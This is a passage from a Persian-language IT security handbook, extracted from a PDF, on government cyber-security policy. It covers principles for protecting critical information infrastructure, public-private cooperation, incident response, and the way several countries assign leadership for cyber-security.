‫ﺑﺮﺍﻱ ﺗﻬﺪﻳﺪﺍﺕ ﻭ ﺣﻮﺍﺩﺙ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﺑﺎﺷﻨﺪ‪.‬‬
‫‪.۲‬‬
‫ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺳﻄﺢ ﺁﮔﺎﻫﻲ ﻭ ﺩﺍﻧﺶ ﺧﻮﺩ ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﻫﻨﺪ ﺗـﺎ‬
‫ﺑﻪ ﺩﺭﻙ ﺍﻓﺮﺍﺩ ﺍﺯ ﻣﺎﻫﻴﺖ ﻭ ﻭﺳﻌﺖ ﺯﻳﺮﺳـﺎﺧﺖ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺣﺴﺎﺱ ﺧﻮﺩ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ ﻭ ﻧﻘـﺶ ﺁﻧﻬـﺎ ﺭﺍ ﺩﺭ ﺭﺍﺳـﺘﺎﻱ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺗﻌﺮﻳﻒ ﻛﻨﻨﺪ‪.‬‬
‫‪.۳‬‬
‫ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺧـﻮﺩ ﺭﺍ ﻣـﻮﺭﺩ ﻣﻄﺎﻟﻌـﻪ ﻗـﺮﺍﺭ‬
‫ﺩﻫﻨﺪ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺘﻘﺎﺑﻞ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﺭﺍ ﻣﺸﺨﺺ ﺳـﺎﺯﻧﺪ ﻭ‬
‫ﺑﺪﻳﻨﻮﺳﻴﻠﻪ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳﻦ ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﻨﺪ‪.‬‬
‫‪.۴‬‬
‫ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﻣﺸﺎﺭﻛﺖ ﻣﻴـﺎﻥ ﺑﺨـﺶ ﻋﻤـﻮﻣﻲ ﻭ ﺑﺨـﺶ‬
‫ﺧﺼﻮﺻﻲ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩﻩ ﻭ ﺍﻃﻼﻋﺎﺕ ﺯﻳﺮﺳـﺎﺧﺘﻲ ﻣﻬـﻢ‬
‫ﺧــﻮﺩ ﺭﺍ ﻣــﻮﺭﺩ ﺗﺠﺰﻳــﻪ ﻭ ﺗﺤﻠﻴــﻞ ﻗــﺮﺍﺭ ﺩﻫﻨــﺪ ﻭ ﺁﻧﻬــﺎ ﺭﺍ‬
‫ﺑﻪﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻧﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﺁﺳﻴﺐﺩﻳﺪﻥ ﺁﻧﻬـﺎ ﺗـﺎ ﺣـﺪ‬
‫ﺍﻣﻜﺎﻥ ﺟﻠـﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻨـﺪ ﻭ ﻧـﺴﺒﺖ ﺑـﻪ ﺁﺳـﻴﺒﻬﺎﻱ ﻭﺍﺭﺩﻩ‬
‫ﻭﺍﻛﻨﺶ ﻧﺸﺎﻥ ﺩﻫﻨﺪ‪.‬‬
‫‪.۵‬‬
‫ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻣﺨﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺯﻣﺎﻥ‬
‫ﺑﺤﺮﺍﻥ ﺍﻳﺠﺎﺩ ﻭ ﺍﺯ ﺁﻥ ﻧﮕﻬـﺪﺍﺭﻱ ﻛﻨﻨـﺪ‪ ،‬ﻭ ﺁﻧﻬـﺎ ﺭﺍ ﻣـﻮﺭﺩ‬
‫‪12‬‬
‫‪13‬‬
‫ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺟﺰﺋﻴﺎﺕ ﻭﺍﻛﻨﺸﻬﺎﻱ ﻛﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑـﻪ ﻣـﺴﺌﻠﻪ‬
‫ﺣﻔﺎﻇـــﺖ ﺍﺯ ﺯﻳﺮﺳـــﺎﺧﺘﻬﺎﻱ ﺍﺳﺎﺳـــﻲ ﻣـــﻲﺗﻮﺍﻧﻴـــﺪ ﺑـــﻪ ﻛﺘـــﺎﺏ‬
‫‪International Critical Information Infrastructure‬‬
‫‪ Protection Handbook‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪ .‬ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺩﺭ ﻣﺮﻛـﺰ‬
‫ﻣﻄﺎﻟﻌﺎﺕ ﺍﻣﻨﻴﺖ ﻭ ﺗﺤﻘﻴﻘﺎﺕ ﺗﺪﺍﺧﻞ ﻣﺆﺳﺴﻪ ﻓﻨﺎﻭﺭﻱ ﺩﻭﻟـﺖ ﺳـﻮﺋﻴﺲ‬
‫ﺑﻪ ﺍﻧﺠﺎﻡ ﺭﺳﻴﺪﻩ ﺍﺳﺖ‪:‬‬
‫‪http://www.isn.ethz.ch/crn‬‬
‫‪Best Practices‬‬
‫‪۱۶‬‬
‫ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩﻫﺎﻱ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫‪http://www.cybersecuritycooperation.org/docu‬‬
‫‪ments/G8_CIIP_Principles.pdf‬‬
‫‪15‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬
‫ﻣﻔﻬﻮﻡ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺑـﻪ ﺩﻻﻳـﻞ ﺯﻳـﺎﺩﻱ ﺣـﺎﺋﺰ ﺍﻫﻤﻴـﺖ‬
‫ﺍﺳﺖ‪ .‬ﺍﻭﻝ‪ ،‬ﺑﻪ ﺭﻭﺷﻦ ﺷﺪﻥ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﻛـﻪ ﭼـﺮﺍ‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻣﻬﻢ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺩﺭﻙ ﻛﻨﻨـﺪ ﻛـﻪ‬
‫ﺩﺭﺻﻮﺭﺕ ﺧﺮﺍﺑﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ ﭘﻮﻝ ﺩﺭ ﺑﺎﻧﻜﻬـﺎ ﻏﻴـﺮ ﻗﺎﺑـﻞ ﭘﺮﺩﺍﺧـﺖ‬
‫ﻣﻲﺷﻮﺩ‪ ،‬ﻗﻄﺎﺭﻫﺎ ﻗﺎﺩﺭ ﺑﻪ ﺗﺮﻙ ﺍﻳﺴﺘﮕﺎﻩ ﻧﻤﻲﺑﺎﺷـﻨﺪ ﻭ ﺣﺘـﻲ ﺁﺏ‬
‫ﺁﺷﺎﻣﻴﺪﻧﻲ ﭘﻤﭗ ﻧﺨﻮﺍﻫﺪ ﺷﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﺑﻬﺘﺮ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧـﺴﺖ ﺁﺛـﺎﺭ‬
‫ﻧﺎﺷــﻲ ﺍﺯ ﻣــﺸﻜﻼﺕ ﺍﻣﻨﻴﺘــﻲ ﺭﺍ ﺩﺭﻙ ﻛﻨﻨــﺪ‪ .‬ﺩﻭﻡ‪ ،‬ﮔﺮﻭﻫﻬــﺎﻱ‬
‫ﺯﻳﺮﺳــﺎﺧﺘﻲ ﺑــﻪ ﺍﻳــﻦ ﺩﻟﻴــﻞ ﺍﻫﻤﻴــﺖ ﺩﺍﺭﻧــﺪ ﻛــﻪ ﺑــﻪ ﺗﻌﺮﻳــﻒ‬
‫ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺟﻮﺍﻣﻊ ﻛﻤـﻚ ﻣـﻲ ﻛﻨﻨـﺪ ﻭ ﺟـﻮﺍﻣﻌﻲ ﺑـﺎ ﻋﻼﻳـﻖ‬
‫ﻣﺸﺘﺮﻙ ﻛﻪ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﻧﻴﺎﺯ ﺑﻪ ﻫﻤﻜـﺎﺭﻱ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ‬
‫ﺩﺍﺭﻧﺪ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺻﻨﻌﺘﮕﺮﺍﻥ ﺻـﻨﻌﺖ ﺑـﺮﻕ ﻭ‬
‫ﻣﺴﺘﺸﺎﺭﺍﻥ ﺩﻭﻟﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻣﺸﺎﺭﻛﺖ ﻳﻜﺪﻳﮕﺮ ﻧﻘـﺶ ﻣﺜﺒﺘـﻲ‬
‫ﺩﺭ ﺭﻓﻊ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺳﻴﺴﺘﻢ ﺑﺮﻕ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ‪ .‬ﻣﻌﻴﺎﺭﻫـﺎﻱ‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﺍﺯ ﺟﻤﻠـﻪ ﺷﻨﺎﺳـﺎﻳﻲ ﺍﻟﮕﻮﻫـﺎﻱ ﺳـﺮﺁﻣﺪﻱ‪ ١٥‬ﻭ‬
‫ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﺗﺎ ﺣﺪﻭﺩﻱ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﻲ ﻣﻮﺟﻮﺩ ﺑﻜﺎﺭ ﺭﻭﺩ‪.‬‬
‫ﺩﺭ ﻣﺤﺪﻭﺩﻩ ﻣﺆﺳﺴﺎﺕ ﻭ ﺧﻄﻮﻁ ﺗﻮﻟﻴﺪ ﺻﻨﻌﺘ ﹺ‬
‫ﺍﻳﻦ ﻣﺆﺳﺴﺎﺕ ﺩﺭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺷﺎﻣﻞ ﺍﺗﺤﺎﺩﻳﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ‪،‬‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﻭ ﺳـﺎﻳﺮ ﺷـﺮﻛﺘﻬﺎﻱ ﻧﻈـﺎﺭﺕ ﺑـﺮ ﺻـﻨﺎﻳﻊ‬
‫ﻣﺨﺘﻠﻒ ﻣﻲ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻛﺜﺮ ﻛﺸﻮﺭﻫﺎ ﺩﺭ ﺑﺨﺶ ﺩﻭﻟﺘـﻲ ﺳﻴﺎﺳـﺘﻬﺎﻱ‬
‫ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﻭﺯﺍﺭﺗﺨﺎﻧـﻪﻫـﺎ ﻭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻧﻈـﺎﺭﺗﻲ‬
‫ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ‪) .‬ﻣﺜﻞ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺑﻄﻮﺭ ﺳـﻨﺘﻲ ﺑﺎﻧﻜـﺪﺍﺭﻱ‪ ،‬ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺭﺍﻩ‬
‫ﺩﻭﺭ ﻭ ﺑﺨﺸﻬﺎﻱ ﺍﻧﺮﮊﻱ ﺭﺍ ﻗﺎﻧﻮﻧﻤﻨﺪ ﻛﺮﺩﻩﺍﻧﺪ(‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪٢٣٤‬‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﺩﻫﻨﺪ ﺗﺎ ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻨـﺪ ﻛـﻪ ﺩﺭ ﻣﻮﻗﻌﻴﺘﻬـﺎﻱ‬
‫ﺍﺿــﻄﺮﺍﺭﻱ ﻫﻤﭽﻨــﺎﻥ ﺍﻣــﻦ ﻭ ﭘﺎﻳــﺪﺍﺭ ﺑــﺎﻗﻲ ﻣــﻲﻣﺎﻧﻨــﺪ ﻭ‬
‫ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫‪.۶‬‬
‫ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻨﺪ ﻛﻪ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺩﺭ ﺩﺳـﺘﺮﺱ‬
‫ﺑﻮﺩﻥ ﺩﺍﺩﻩ‪ ،١٧‬ﺍﻣﻨﻴﺖ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﺣـﺴﺎﺱ ﺭﺍ‬
‫ﻧﻴﺰ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﺍﺩﻩﺍﻧﺪ‪.‬‬
‫‪.۷‬‬
‫ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺭﺩﻳـﺎﺑﻲ ﺣﻤـﻼﺕ ﺑـﻪ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﻣﻬـﻢ‬
‫ﺍﻃﻼﻋــﺎﺗﻲ ﺭﺍ ﺗــﺴﻬﻴﻞ ﺑﺨــﺸﻴﺪﻩ ﻭ ﺩﺭ ﺯﻣــﺎﻥ ﻣﻨﺎﺳــﺐ‪،‬‬
‫ﺍﻃﻼﻋﺎﺕ ﺍﻳﻦ ﺭﺩﻳﺎﺑﻲ ﺭﺍ ﺑﺮﺍﻱ ﺳﺎﻳﺮ ﻛﺸﻮﺭﻫﺎﻱ ﻣﺘﻘﺎﺿـﻲ‬
‫ﻣﻨﺘﺸﺮ ﺳﺎﺯﻧﺪ‪.‬‬
‫‪.۸‬‬
‫ﻛــﺸﻮﺭﻫﺎ ﺑﺎﻳــﺪ ﺩﺭ ﺧــﺼﻮﺹ ﺍﻓــﺰﺍﻳﺶ ﻗﺎﺑﻠﻴــﺖ ﻭﺍﻛــﻨﺶ‪،‬‬
‫ﺁﻣﻮﺯﺷﻬﺎ ﻭ ﺗﻤﺮﻳﻨﺎﺗﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻭ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﺧـﻮﺩ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﭘﻴﺸﺎﻣﺪﻫﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﺩﺭ ﺯﻣﺎﻥ ﻭﻗـﻮﻉ ﺣﻤﻠـﻪ ﻣـﻮﺭﺩ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﺩﻫﻨﺪ ﻭ ﻫﻤﮕـﺎﻥ ﺭﺍ ﻧﻴـﺰ ﺗـﺸﻮﻳﻖ ﺑـﻪ ﺍﻧﺠـﺎﻡ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺸﺎﺑﻪ ﺳﺎﺯﻧﺪ‪.‬‬
‫‪.۹‬‬
‫ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻨﺪ ﻛﻪ ﺑـﺮﺍﻱ ﻣﻘﺎﺑﻠـﻪ ﺑـﺎ‬
‫ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﻗﻮﺍﻧﻴﻦ ﻣﻨﺎﺳﺐ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻗﺎﺑﻞ ﻗﺒـﻮﻝ‬
‫ﺩﺍﺭﻧﺪ ﻭ ﺍﻳﻦ ﺗﺤﻘﻴﻘﺎﺕ ﺭﺍ ﺑﺎ ﺳﺎﻳﺮ ﻛﺸﻮﺭﻫﺎ ﺑﻪ ﻧﺤﻮ ﺍﺣـﺴﻦ‬
‫ﻣﻄﺎﺑﻘــﺖ ﺩﻫﻨــﺪ ‪ -‬ﻣﺎﻧﻨــﺪ ﻗــﻮﺍﻧﻴﻨﻲ ﻛــﻪ ﺩﺭ ﻛﻨﻮﺍﻧــﺴﻴﻮﻥ‬
‫ﺗﺨﻠﻔﺎﺕ ﺳﺎﻳﺒﺮ ﺷـﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ‪ ١٨‬ﺩﺭ ﻧـﻮﺍﻣﺒﺮ ﺳـﺎﻝ ‪۲۰۰۱‬‬
‫ﺗﺼﻮﻳﺐ ﺷﺪ ﻭ ﭘﺮﺳﻨﻞ ﺁﻣﻮﺯﺵ ﺩﻳﺪﻩﺍﻱ ﺭﺍ ﺁﻣﺎﺩﺓ ﺍﺭﺯﻳﺎﺑﻲ ﻭ‬
‫ﺭﺩﻳﺎﺑﻲ ﺣﻤﻼﺕ ﺍﻧﺠﺎﻡ ﮔﺮﻓﺘﻪ ﺑﻪ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺣﺴﺎﺱ ﻧﻤﻮﺩ‪.‬‬
‫‪ .۱۰‬ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺩﺭ ﺯﻣﺎﻥ ﻣﻨﺎﺳﺐ ﺩﺭ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‬
‫ﻣﺸﺎﺭﻛﺖ ﻛﻨﻨﺪ ﺗﺎ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﻣﻬﻢ ﺍﻃﻼﻋـﺎﺗﻲ ﺧـﻮﺩ ﺭﺍ‬
‫ﺍﻳﻤﻦ ﺳﺎﺯﻧﺪ‪ ،‬ﻛﻪ ﺍﻳﻦ ﺍﻣـﺮ ﺷـﺎﻣﻞ ﺗﺄﺳـﻴﺲ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﻫﺸﺪﺍﺭﺩﻫﻨﺪﺓ ﺍﺿﻄﺮﺍﺭﻱ‪ ،‬ﺍﺷﺘﺮﺍﻙ ﻭ ﺗﺤﻠﻴﻞ ﺍﻃﻼﻋﺎﺕ ﺑـﺮ‬
‫ﺍﺳﺎﺱ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺭﺧﺪﺍﺩﻫﺎ‪ ،‬ﻭ ﻧﻴﺰ ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﻣﻮﺭﺩ‬
‫ﺣﻤﻼﺕ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺑﻪ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺍﻳﻨﭽﻨﻴﻨﻲ ﻭ ﺍﻟﺒﺘﻪ ﺑـﺎ‬
‫ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻗﻮﺍﻧﻴﻦ ﻣﺤﻠﻲ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫‪ .۱۱‬ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺗﺤﻘﻴﻖ ﻭ ﺗﻮﺳﻌﺔ ﻣﻠﻲ ﻭ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺧـﻮﺩ ﺭﺍ‬
‫ﺍﻓﺰﺍﻳﺶ ﺩﻫﻨﺪ ﻭ ﺑـﺮ ﺍﺳـﺎﺱ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ‪،‬‬
‫ﻣﺸﻮﻕ ﺑﻜﺎﺭﮔﻴﺮﻱ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺎﺷﻨﺪ‪.‬‬
‫‪Data Availability‬‬
‫‪Council of Europe Cybercrime Convention‬‬
‫‪17‬‬
‫‪18‬‬
‫ﺧﺼﻮﺻﻴﺖ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺩﺍﺧﻠـﻲ‬
‫ﻣﻴﺎﻥ ﺑﺨﺸﻬﺎ ‪ -‬ﺷﺎﻣﻞ ﺳﺨﺖﺍﻓﺰﺍﺭﻫﺎ ﻭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻣـﺸﺎﺑﻪ ﻭ‬
‫ﻫﻤﺎﻧﻨﺪ ‪ -‬ﻭ ﻭﺍﺑﺴﺘﮕﻲ ﺑﻪ ﻳﻚ ﺷﺒﻜﻪ ﺍﺭﺗﺒـﺎﻃﻲ ﻣـﺸﺘﺮﻙ ﺍﺳـﺖ‪.‬‬
‫ﺑﻨﺎﺑﺮﺍﻳﻦ ﺩﻭﻟﺘﻬﺎ ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻛﻨﻨـﺪ ﻛـﻪ ﺿـﺎﻣﻦ‬
‫ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺭﺍﻩﺣﻠﻬﺎﻱ ﻣـﺮﺗﺒﻂ‬
‫ﺑﺎ ﮔﺮﻭﻫﻬﺎﻱ ﺯﻳﺮﺳﺎﺧﺘﻲ ﺑﺎﺷﻨﺪ‪ .‬ﻣﻲﺗـﻮﺍﻥ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ ﺑـﺎ ﺍﻧﺘﺨـﺎﺏ‬
‫ﻳﻚ ﻣﺮﻛﺰ ﺭﺍﻫﺒﺮﻱ ﺩﺭ ﺩﻭﻟﺖ ﺑـﺮﺍﻱ ﻫﻤﺎﻫﻨـﮓﺳـﺎﺯﻱ ﻣﺘﻤﺮﻛـﺰ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻋﻤﻠـﻲ ﻛـﺮﺩ ﻭ ﻣـﺎ ﻧﻴـﺰ ﺩﺭ‬
‫ﺍﺩﺍﻣﺔ ﺍﻳﻦ ﺑﺨﺶ ﺑﻪ ﺑﺮﺭﺳﻲ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺧﻮﺍﻫﻴﻢ ﭘﺮﺩﺍﺧﺖ‪.‬‬
‫‪٢٣٥‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬
‫ﺭﻭﺑﺮﻭ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺗﻌﻴﻴﻦ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺩﺭ ﺩﻭﻟﺖ ﺑﺎﻳـﺪ ﺍﺑﺘـﺪﺍ ﺑـﻪ‬
‫ﺍﻳﻦ ﭘﺮﺳﺶ ﭘﺎﺳﺦ ﺩﺍﺩ ﻛﻪ‪ :‬ﺁﻳﺎ ﺍﺯ ﻧﻈﺮ ﺍﻗﺘﺼﺎﺩﻱ‪ ،‬ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﻭ ﻳﺎ‬
‫ﻣﻘﺮﺭﺍﺕ ﺣﺎﻛﻢ‪ ،‬ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﻳـﻚ ﻣـﺴﺌﻠﻪ ﻗﺎﺑـﻞ ﺍﻫﻤﻴـﺖ‬
‫ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﺩ؟‬
‫ﻓﺼﻞ ﺩﻭﻡ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ‬
‫ﺑﺮﺍﻱ ﭘﺎﺳﺦ ﺑﻪ ﺍﻳﻦ ﭘﺮﺳﺶ ﺑﺪ ﻧﻴﺴﺖ ﺑﺪﺍﻧﻴﻢ‪:‬‬
‫•‬
‫ﺩﺭ ﺑﺮﻳﺘﺎﻧﻴﺎ‪ ،‬ﺍﺩﺍﺭﺓ ﺍﻗﺎﻣﺖ‪ ٢٢‬ﻛﻪ ﻣﺴﺌﻮﻝ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﺳﺖ‬
‫‪٢٣‬‬
‫ﺭﻫﺒﺮﻱ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺭﺩ‪.‬‬
‫•‬
‫ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺭﺍ ﺩﺭ ﺑﺨـﺶ ﺍﻣﻨﻴـﺖ ﺩﺍﺧﻠـﻲ‬
‫ﺧﻮﺩ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺗﻌﻤﺪﹰﺍ ﻭ ﺑﺼﻮﺭﺕ ﺁﮔﺎﻫﺎﻧﻪ ﺑﺨـﺶ‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺆﺳﺴﺔ ﻣﻠﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻭ ﻓﻨﺎﻭﺭﻱ‪ ٢٤‬ﺗﺤﺖ‬
‫‪٢٥‬‬
‫ﻧﻈﺎﺭﺕ ﺩﭘﺎﺭﺗﻤﺎﻥ ﺗﺠﺎﺭﺕ ﺭﺍ ﻫﻤﭽﻨﺎﻥ ﺣﻔﻆ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫•‬
‫ﺍﺳﺘﺮﺍﻟﻴﺎ ﻳﻚ ﮔﺮﻭﻩ ﻫﻤﻜﺎﺭﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﻫﻤﺎﻫﻨﮓﺳﺎﺯﻱ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ ﺍﻳﺠـﺎﺩ ﻧﻤـﻮﺩﻩ ‪-‬‬
‫‪Cyber-Security‬‬
‫‪۲۱‬‬
‫ﺗﻤﻬﻴﺪ ﺳﺎﺧﺘﺎﺭ ﻣﻠﻲ ﺑﺮﺍﻱ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﻭﻟـﺖ ﺭﺍ ﺑـﺎ‬
‫ﭼﺎﻟﺸﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﺍﺯ ﺟﻤﻠـﻪ ﭼﮕـﻮﻧﮕﻲ ﺭﻫﺒـﺮﻱ ﺍﻳـﻦ ﺳـﺎﺧﺘﺎﺭ‬
‫‪E-Government‬‬
‫‪19‬‬
‫‪22‬‬
‫ﺍﺩﺍﺭﺓ ﺍﻗﺎﻣﺖ ﺍﻧﮕﻠﺴﺘﺎﻥ ﻳﻚ ﻣﺮﻛﺰ ﺯﻳﺮﺳﺎﺧﺘﻲ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻠـﻲ‬
‫)‪ (NISCC‬ﺗﺄﺳﻴﺲ ﻛﺮﺩﻩ ﻛﻪ ﺩﺭ ﻣﺴﺎﺋﻞ ﺣﻴﺎﺗﻲ ﺍﻣﻨﻴﺖ ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ﻛﺎﺭ‬
